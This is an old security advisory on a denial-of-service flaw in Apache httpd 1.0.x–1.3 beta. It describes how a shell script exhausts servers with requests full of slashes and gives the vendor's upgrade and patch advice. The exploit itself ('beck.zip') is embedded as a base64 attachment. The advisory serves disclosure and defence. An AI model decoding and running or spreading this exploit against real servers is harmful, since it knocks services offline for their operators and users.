COMMAND

    httpd (Apache)

SYSTEMS AFFECTED

    Systems running Apache httpd 1.0.x, 1.1.x, 1.2.x, 1.3.x (beta)

PROBLEM

    Michal  Zalewski  found  following.   Here's  a simple exploit for
    Apache  httpd  version  1.2.x  (tested  on 1.2.4).  When launched,
    causes incerases  of victim's  load average  and extreme slowdowns
    of disk operations.   On tested i586  Linux annoying slowdown  has
    been experienced immediately (after maybe 5 seconds). After  about
    4 minutes work has been turned into real hell (286?).

    Attached program ('beck') is a  shell script. It works by  sending
    excessive http requests with thousands of '/'s inside (parsed from
    file  'beck.dat').  Single  request  causes  just  a little longer
    thinking of Apache.  But when requests are sent from a loop - huh,
    victim system becomes slower and slower.  All of the versions seem
    to be  affected in  one way  or another,  but the  1.0.x and 1.1.x
    seems to be less effective, since the load average goes down right
    after the attack has stopped,  unlike 1.2.x and 1.3.x, which  kept
    going even after the attack has stopped.

    ---
    Content-Type: application/octet-stream; name="beck.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="beck.zip"
    Content-MD5: d2xzeGI69spEcIU/uT8lwg==

    UEsDBBQAAgAIAGCmnSMQwy97+QEAAKADAAAEABAAYmVja1VYDADzFKg0I/+nNAAAAACFUl1P
    2zAUfc+vOHgVbJqStvAydYDGumpCDJAKe1mFwHFuawvXrmynQdN+/JyPfrBNmh8iJTnn3HPO
    9ZuDfq5MP+deJgkJaZsH2OfJ+AppiosVF5IwzI6zF3who7iGneOO1kqQBw+Bi2fWkS7KIK0b
    4VoJGXE/uKbKPyucasGXoZx/yq33mQ/c/1Qiq3iVrfR5S04SNccMrDdkODsDY3j4iCDJJEAr
    /v3u4utkhN4AcXRQy0dpfcBMSKUL/8A63BaOVzCk4EXhyPvaffsHrjRGmUWXke1RW1G0J4Wx
    WU3zalnqwA2RLT2ENYaijjUes5PBKwcvKmCQzFWSjG9vbh6/XV5f3p+dDLYhjxkO/gi5B+wd
    N9QGe4B0jpzEc1bw8Fcnk+n0djrCXGnC0QZ1hGUZI+eEleaCCigDUTpHJqBQLvu30W6DzT7r
    UnpDvF0rjt7O2H7kd/XlGAen348RLHhuXcg29+BeknLQlhfga3J8QfDWGlRKawitljmkWkhy
    iMCFDD4yk0rWKWZ13rjjmLSoHQbShkLt5sMAp9siDs/7Ba37poyChxHW9brzypBGNfa08r8W
    jlZIRSf1tF9612NqwMZ764wOYy+O6mtRxP1XXIXYSZZlYA1r4/U/E9nWPWvHNpHq4zVFyLB5
    K6yhnRd2e1XPiCtpvv8GUEsDBBQAAgAIAHmdnSPuvoPlIgAAAPYfAAAIABAAYmVjay5kYXRV
    WAwAZwSoNGbvpzQAAAAA7cFBEQAABACwvxQaSOEU0D+LHO62TW8WAAAAAAAAAPBPHFBLAQIV
    AxQAAgAIAGCmnSMQwy97+QEAAKADAAAEAAwAAAAAAAEAAED/gQAAAABiZWNrVVgIAPMUqDQj
    /6c0UEsBAhUDFAACAAgAeZ2dI+6+g+UiAAAA9h8AAAgADAAAAAAAAQAAQLaBKwIAAGJlY2su
    ZGF0VVgIAGcEqDRm76c0UEsFBgAAAAACAAIAgAAAAIMCAAAAAA==

    -----

SOLUTION

    Apache  very  strongly  recommends  that  anyone using versions of
    Apache previous  to 1.2  or earlier  1.2 versions  upgrade to  the
    released 1.2.5.  It is now available at:

        http://www.apache.org/dist/

    There are no plans for an immediate 1.3b4 release to correct these
    problems in the  1.3 beta development  tree, however we  will make
    patches for 1.3b3 to correct these issues available at:

        http://www.apache.org/dist/patches/apply_to_1.3b3/